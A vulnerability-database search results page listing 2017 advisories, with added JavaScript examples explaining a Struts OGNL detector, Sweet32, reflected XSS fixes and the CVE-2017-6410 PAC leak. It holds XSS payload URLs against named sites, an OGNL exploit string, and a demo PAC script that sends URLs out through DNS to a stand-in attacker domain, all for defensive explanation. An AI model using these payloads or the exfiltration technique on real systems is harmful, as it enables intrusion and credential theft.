7687 matches found

Mageia, added 2017/03/23 7:19 a.m., 40 views

Updated kdelibs4 packages fix security vulnerability

Using a malicious PAC file, and then using exfiltration methods in the PAC function FindProxyForURL enables the attacker to expose full https URLs. This is a security issue since https URLs may contain sensitive information in the URL authentication part user:password@host, and in the path and th...

CVSS 5.5 | AI score 0.3 | EPSS 0.00828 | Exploits 0 | References 2
0day.today, added 2017/03/23 12:00 a.m., 66 views

OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - license.php Remote Command Execution Exploit

Exploit for multiple platforms in the web applications category. This module requires Metasploit: http://metasploit.com/download. Current source: https://github.com/rapid7/metasploit-framework. Module excerpt: require 'msf/core' class MetasploitModule 'OP5 license.php Remote Command Execution', 'Description' => %q This...

CVSS 10 | AI score 6.6 | EPSS 0.73949 | Exploits 7
Openbugbounty, added 2017/03/22 7:02 a.m., 9 views

shop.wilde-13.eu XSS vulnerability

Vulnerable URL: http://shop.wilde-13.eu/werbeartikel/suchen?keyword=%22%3Etrolo%3Ci%3Etralala%3Cimg+src%3Dx%20onerror=prompt/openbugbounty/%3E
Details:
  Patched: No
  Latest check for patch: 28.07.2017
  Vulnerability type: XSS
  Vulnerability status: Publicly disclosed...

AI score 6.3 | Exploits 0
GithubExploit, added 2017/03/17 6:05 p.m., 7 views

Exploit for Improper Handling of Exceptional Conditions in Apache Struts

StrutsShell Apache Struts CVE-2017-5638 Shell Introducti...

CVSS 10 | AI score 9.5 | EPSS 0.99999 | Exploits 44
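The entry above is a published exploit for CVE-2017-5638. On the defensive side, the thing a practitioner wants is a detection: CVE-2017-5638 is triggered by an OGNL expression smuggled in the Content-Type header of a multipart request (a detail of the CVE, not of this entry's truncated text). The following is an added example written for this page, not code from the StrutsShell project or from the GithubExploit entry. The log format it parses (client IP, quoted request line, quoted Content-Type) and the sample lines are constructed for the demo.

```javascript
// Added example: flag requests whose Content-Type header carries an OGNL
// expression, the delivery vector for CVE-2017-5638 (Apache Struts 2).
// Assumed, constructed log format: <client ip> "<request line>" "<Content-Type>"

// Markers that have no business in a Content-Type value: OGNL expression
// delimiters and identifiers used by the public sandbox-escape payloads.
const OGNL_MARKERS = [
  /%\{/,                 // OGNL expression open "%{"
  /\$\{/,                // "${" is also evaluated by the Struts 2 OGNL engine
  /#_memberAccess/i,     // sandbox object touched by the public exploits
  /ognl\./i,             // direct OGNL class references
  /getRuntime\(\)/i,     // Runtime.exec style command execution
];

const LOG_LINE = /^(\S+) "([^"]*)" "([^"]*)"$/;

// Returns one record per line whose Content-Type matches a marker.
function flagStrutsOgnl(lines) {
  const hits = [];
  for (const line of lines) {
    const m = LOG_LINE.exec(line);
    if (!m) continue;               // skip lines that do not fit the format
    const [, client, request, contentType] = m;
    const marker = OGNL_MARKERS.find((re) => re.test(contentType));
    if (marker) hits.push({ client, request, contentType, marker: marker.source });
  }
  return hits;
}

// Constructed sample log: a benign multipart upload, a GET, and one OGNL payload.
const SAMPLE_LOG = [
  '198.51.100.7 "POST /upload.action HTTP/1.1" "multipart/form-data; boundary=----WebKitFormBoundaryx1"',
  '198.51.100.8 "GET /index.action HTTP/1.1" "-"',
  '203.0.113.9 "POST /upload.action HTTP/1.1" "%{(#_=\'multipart/form-data\').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#cmd=\'id\')}"',
];

console.log(JSON.stringify(flagStrutsOgnl(SAMPLE_LOG), null, 2));
```

Match on the header value, not on the URL: the request line of the attack is indistinguishable from a legitimate upload, which is why WAF rules keyed on paths missed this bug.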
OSV, added 2017/03/17 7:38 a.m., 6 views

SUSE-SU-2017:0716-1 Security update for java-1_7_0-ibm

This update for java-1_7_0-ibm fixes the following issues: Security issue fixed: - CVE-2016-2183: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remo...

CVSS 7.5 | AI score 7.4 | EPSS 0.95707 | Exploits 7 | References 3
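The "birthday bound of approximately four billion blocks" in the CVE text follows directly from the 64-bit block size of DES and Triple DES: after about 2^32 blocks on one connection, a CBC ciphertext-block collision becomes likely and leaks plaintext XORs. The block below is an added example written for this page (not part of the SUSE advisory or of IBM Java): it computes the bound for a given block size and separates a cipher list into suites that keep a 64-bit block cipher and suites that do not. Suite names follow OpenSSL's naming; the list is constructed.

```javascript
// Added example: quantify the CVE-2016-2183 ("Sweet32") birthday bound and
// flag cipher suites built on 64-bit block ciphers.

// Collision probability after n blocks under a b-bit block cipher in CBC mode,
// from the birthday approximation p ~ 1 - exp(-n^2 / 2^(b+1)).
function collisionProbability(blocks, blockBits) {
  return 1 - Math.exp(-(blocks ** 2) / 2 ** (blockBits + 1));
}

// Inverse: how many blocks until a collision occurs with probability p.
function blocksForProbability(blockBits, p) {
  return Math.sqrt(-(2 ** (blockBits + 1)) * Math.log(1 - p));
}

// Bytes that may flow over one long-lived connection before probability p is reached.
function bytesForProbability(blockBits, p) {
  return blocksForProbability(blockBits, p) * (blockBits / 8);
}

// OpenSSL cipher-name tokens that identify 64-bit block ciphers.
const SMALL_BLOCK_TOKENS = new Set(['DES', '3DES', 'CBC3', 'IDEA', 'RC2', 'BF', 'CAST5']);

function usesSmallBlockCipher(suiteName) {
  return suiteName.split('-').some((tok) => SMALL_BLOCK_TOKENS.has(tok.toUpperCase()));
}

// Split a cipher list into suites to keep and suites Sweet32 affects.
function auditCipherList(suites) {
  const keep = [];
  const drop = [];
  for (const s of suites) (usesSmallBlockCipher(s) ? drop : keep).push(s);
  return { keep, drop };
}

// Constructed cipher list mixing modern AEAD suites with legacy 3DES/IDEA ones.
const SAMPLE_SUITES = [
  'ECDHE-RSA-AES128-GCM-SHA256',
  'ECDHE-RSA-AES256-GCM-SHA384',
  'ECDHE-RSA-DES-CBC3-SHA',
  'DES-CBC3-SHA',
  'IDEA-CBC-SHA',
  'ECDHE-RSA-CHACHA20-POLY1305',
];

const GIB = 2 ** 30;
console.log(`64-bit blocks to 50% collision: ${blocksForProbability(64, 0.5).toExponential(2)} blocks, ` +
            `${(bytesForProbability(64, 0.5) / GIB).toFixed(1)} GiB on one connection`);
console.log(`128-bit blocks to 50% collision: ${blocksForProbability(128, 0.5).toExponential(2)} blocks`);
console.log(auditCipherList(SAMPLE_SUITES));
```

At 2^32 blocks the collision probability is already about 0.39, so "four billion blocks" (roughly 32 GiB of traffic on a single TLS session) is the practical limit, and a 128-bit block cipher pushes the same bound out by a factor of 2^32. Removing the `drop` list from the server configuration is the fix the advisory's Java update applies by default.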
ThreatPost, added 2017/03/17 6:00 a.m., 10 views

US-CERT Warns HTTPS Inspection May Degrade TLS Security

Recent academic work looking at the degradation of security occurring when HTTPS inspection tools are sitting in TLS traffic streams has been escalated by an alert published Thursday by the Department of Homeland Security. DHS’ US-CERT warned enterprises that running standalone inspection...

AI score 7 | Exploits 0 | References 3
Kitploit, added 2017/03/16 2:11 p.m., 114 views

SSLsplit - transparent SSL/TLS interception

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. It is intended to be useful for network forensics, application security analysis and penetration testing. SSLsplit is designed to transparently terminate connections that are redirected to it using a...

AI score 7.1 | Exploits 0 | References 1
Citrix, added 2017/03/15 12:00 a.m., 9 views

An SSL error has occurred and a secure connection to the server cannot be made.

“An SSL error has occurred and a secure connection to the server cannot be made.” This error was seen when browsing to HTTPS sites with Secure Web over a Full VPN tunnel. HTTP sites loaded correctly...

AI score 7 | Exploits 0
RedHat Linux, added 2017/03/14 5:32 p.m., 3 views

tomcat: Infinite loop in the processing of https requests

It was discovered that a programming error in the processing of HTTPS requests in the Apache Tomcat servlet and JSP engine may result in denial of service via an infinite loop...

CVSS 7.5 | AI score 5.8 | EPSS 0.07486 | Exploits 0 | References 6
Tenable Nessus, added 2017/03/14 12:00 a.m., 32 views

openSUSE Security Update : kdelibs4 / kio (openSUSE-2017-334)

This update for kdelibs4, kio fixes the following issues: - CVE-2017-6410: Information leak when accessing https when using a malicious PAC file (boo#1027520). (C) Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from openSUSE...

CVSS 5.5 | AI score 6 | EPSS 0.00828 | Exploits 0 | References 2
Tenable Nessus, added 2017/03/13 12:00 a.m., 11 views

FreeBSD : kio: Information Leak when accessing https when using a malicious PAC file (f714d8ab-028e-11e7-8042-50e549ebab6c)

Albert Astals Cid reports : Using a malicious PAC file, and then using exfiltration methods in the PAC function FindProxyForURL enables the attacker to expose full https URLs. This is a security issue since https URLs may contain sensitive information in the URL authentication part...

AI score 5.5 | Exploits 0 | References 2
Openbugbounty, added 2017/03/09 11:50 a.m., 10 views

prestonpalace.nl XSS vulnerability

Vulnerable URL: https://www.prestonpalace.nl/search/All/%2522%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253Dprompt%2528%2527OPENBUGBOUNTY%2527%2529%253B%253E?zoekresultaat=%2522%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253Dprompt%2528%2527OPENBUGBOUNTY%2527%2529%253B%253E
Details: ...

AI score 6.2 | Exploits 0
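Both Open Bug Bounty reports in this list (shop.wilde-13.eu above and prestonpalace.nl here) are the same bug: a search keyword reflected into the results page without HTML encoding, so a `">` closes the attribute the value sits in and the rest of the payload becomes a new element. The block below is an added example written for this page, not code from either site or from Open Bug Bounty. The page template is constructed; the payload is recovered by URL-decoding the prestonpalace.nl report's `zoekresultaat` parameter.

```javascript
// Added example: the reflected-XSS pattern from the two Open Bug Bounty reports,
// shown vulnerable and fixed, exercised with the payload from the report URL.

// Reflects the keyword into HTML as-is: the reported behaviour. (Constructed template;
// the parameter name "zoekresultaat" is the one in the prestonpalace.nl URL.)
function renderResultsVulnerable(keyword) {
  return `<h1>Results for "${keyword}"</h1>\n<input name="zoekresultaat" value="${keyword}">`;
}

// Escape the five characters that matter in HTML text and double-quoted attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Same template, value escaped for the context it lands in.
function renderResultsFixed(keyword) {
  const safe = escapeHtml(keyword);
  return `<h1>Results for "${safe}"</h1>\n<input name="zoekresultaat" value="${safe}">`;
}

// The report double-encodes the payload (%2522 -> %22 -> "), so decode twice;
// "+" in a query string stands for a space.
const REPORT_PARAM = '%2522%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253Dprompt%2528%2527OPENBUGBOUNTY%2527%2529%253B%253E';
const PAYLOAD = decodeURIComponent(decodeURIComponent(REPORT_PARAM)).replace(/\+/g, ' ');

// Crude but sufficient for the demo: did an element with an onerror handler get injected?
function injectsElement(html, tag) {
  return new RegExp(`<${tag}\\b[^>]*\\bonerror=`, 'i').test(html);
}

console.log('payload:', PAYLOAD);
console.log('vulnerable injects <img>:', injectsElement(renderResultsVulnerable(PAYLOAD), 'img'));
console.log('fixed injects <img>:', injectsElement(renderResultsFixed(PAYLOAD), 'img'));
```

Encoding has to match the output context: the same `escapeHtml` is correct for text nodes and quoted attribute values, but a value placed inside a `<script>` block, a URL, or an unquoted attribute needs its own encoder, and a templating engine that auto-escapes by default removes the chance of forgetting.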
Tenable Nessus, added 2017/03/08 12:00 a.m., 16 views

HTTP/HTTPS Client Connection to Cloudflare Server

Binary data 9975.prm...

AI score 7.3 | Exploits 0 | References 1
Tenable Nessus, added 2017/03/08 12:00 a.m., 12 views

Cloudflare Server Detection via HTTP/HTTPS

Binary data 7256.pasl...

AI score 7.3 | Exploits 0
Oracle linux, added 2017/03/02 12:00 a.m., 28 views

ipa security and bug fix update

4.4.0-14.0.1.el7_3.6
 - Blank out header-logo.png product-name.png
 - Replace login-screen-logo.png 20362818
4.4.0-14.6
 - Resolves: 1416488 replication race condition prevents IPA to install
 - waitforentry: use only DN as parameter
 - Wait until HTTPS principal entry is replicated to replica
 - Use prop...

CVSS 8.1 | AI score 7.9 | EPSS 0.01283 | Exploits 0
OSV, added 2017/03/02 12:00 a.m., 2 views

UBUNTU-CVE-2017-6410

kpac/script.cpp in KDE kio before 5.32 and kdelibs before 4.14.30 calls the PAC FindProxyForURL function with a full https URL potentially including Basic Authentication credentials, a query string, or PATHINFO, which allows remote attackers to obtain sensitive information via a crafted PAC file...

CVSS 5.5 | AI score 7.2 | EPSS 0.00828 | Exploits 0 | References 4
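Four entries in this list (Mageia, the openSUSE and FreeBSD Nessus plugins, and this Ubuntu record) describe CVE-2017-6410: the client handed FindProxyForURL the complete https URL, including `user:password@`, path and query, and a PAC script is attacker-supplied code that can push anything it sees into a DNS lookup. The block below is an added example written for this page, not code from KDE kio, kdelibs or any of the advisories. It is a small PAC-evaluation harness with a recording `dnsResolve`, a malicious script that encodes the URL into DNS labels, and the mitigation the advisories imply: for https, give the script only `scheme://host/`. The attacker domain, sample URL and secrets are constructed.

```javascript
// Added example: how a malicious PAC script exfiltrates a full https URL via
// dnsResolve(), and why stripping the URL to its origin (CVE-2017-6410 fix) stops it.

// Attacker-controlled PAC script: turns the URL it receives into DNS labels and forces
// a lookup, so the attacker's authoritative name server logs the URL. (Constructed.)
const MALICIOUS_PAC = `
function FindProxyForURL(url, host) {
  var labels = url.replace(/[^A-Za-z0-9]/g, "-").match(/.{1,63}/g).join(".");
  dnsResolve(labels + ".pac-exfil.attacker.example");
  return "DIRECT";
}`;

// Evaluate a PAC script with a stubbed dnsResolve that records every lookup.
// new Function is fine for a demo; a real client runs PAC in a sandboxed JS engine.
function runPac(pacSource, url) {
  const dnsLookups = [];
  const dnsResolve = (name) => { dnsLookups.push(name); return '203.0.113.10'; };
  const host = new URL(url).hostname;
  const evaluate = new Function('url', 'host', 'dnsResolve',
    `${pacSource}\nreturn FindProxyForURL(url, host);`);
  return { proxy: evaluate(url, host, dnsResolve), dnsLookups };
}

// Mitigation: to pick a proxy, the script only needs the origin of an https URL.
// Drop userinfo, path, query and fragment before the script ever sees it.
function sanitizeUrlForPac(url) {
  const u = new URL(url);
  return u.protocol === 'https:' ? `${u.protocol}//${u.host}/` : url;
}

// Did any recorded lookup carry one of the secrets from the original URL?
function leaked(dnsLookups, secrets) {
  return secrets.some((s) => dnsLookups.some((name) => name.includes(s)));
}

// Constructed sample: credentials in userinfo, an account path, a session token in the query.
const SAMPLE_URL = 'https://alice:s3cret@bank.example/accounts/4711?session=tok3n';
const SECRETS = ['s3cret', 'accounts', 'tok3n'];

console.log('full URL, lookups:', runPac(MALICIOUS_PAC, SAMPLE_URL).dnsLookups);
console.log('sanitized URL, lookups:', runPac(MALICIOUS_PAC, sanitizeUrlForPac(SAMPLE_URL)).dnsLookups);
```

Note that the PAC script's return value is irrelevant to the attack; `DIRECT` keeps the victim's browsing working, and the exfiltration happens as a side effect of a helper the PAC API deliberately exposes. The only robust fix is on the caller's side, which is what the kio 5.32 and kdelibs 4.14.30 updates change.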
Tenable Nessus, added 2017/03/01 12:00 a.m., 13 views

Cloudflare Client Detection via HTTP/HTTPS

Binary data 7252.pasl...

AI score 7.3 | Exploits 0
ThreatPost, added 2017/02/24 10:48 a.m., 12 views

Cloudbleed Bug Leaks Sensitive Cloudflare Customer Data

The Cloudflare content delivery network for months has been leaking customer data, everything from private messages to encryption keys and credentials belonging to users of some of the Internet’s biggest properties. The vulnerability has been addressed, Cloudflare CTO John Graham-Cumming said, bu...

AI score 7 | Exploits 0 | References 10
Debian, added 2017/02/22 7:52 p.m., 38 views

[SECURITY] [DLA 823-2] tomcat7 regression update

Package: tomcat7. Version: 7.0.28-4+deb7u11. CVE ID: CVE-2017-6056. Debian Bug: 854551. The update for tomcat7 issued as DLA-823-1 caused the server to return HTTP 400 errors under certain circumstances. Updated packages are now available to correct this issue. For reference, the original...

CVSS 7.5 | AI score 7.9 | EPSS 0.07486 | Exploits 0
Debian, added 2017/02/22 4:14 p.m., 15 views

[SECURITY] [DSA 3788-2] tomcat8 regression update

Debian Security Advisory DSA-3788-2, https://www.debian.org/security/, Salvatore Bonaccorso, February 22, 2017, https://www.debian.org/security/faq...

AI score 6.8 | Exploits 0